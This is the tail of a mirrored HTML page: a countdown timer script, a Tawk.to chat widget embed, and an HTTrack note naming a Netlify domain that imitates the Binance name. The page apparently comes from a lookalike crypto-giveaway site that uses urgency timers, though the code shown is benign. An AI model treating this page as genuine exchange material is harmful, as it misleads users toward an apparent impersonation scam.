                expire = new Date(t_ex*1000).getTime();
                now = new Date().getTime(); 
                dis = expire - now
                if (dis > 0){
                    timer_html = document.getElementById('timer')
                    timer(t_ex, timer_html);
                    setInterval(()=>{
                        timer(t_ex, timer_html);
                    }, 1)
                }
                
            }
        }
        set_timer()
    </script>

   <!--Start of Tawk.to Script-->
<script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/653331f9a84dd54dc4836bb4/1hd7vme8j';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
<!--End of Tawk.to Script-->
</body>


<!-- Mirrored from binancxcyptoboxbsc.netlify.app/ltc/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 14 Oct 2023 23:10:33 GMT -->
</html>
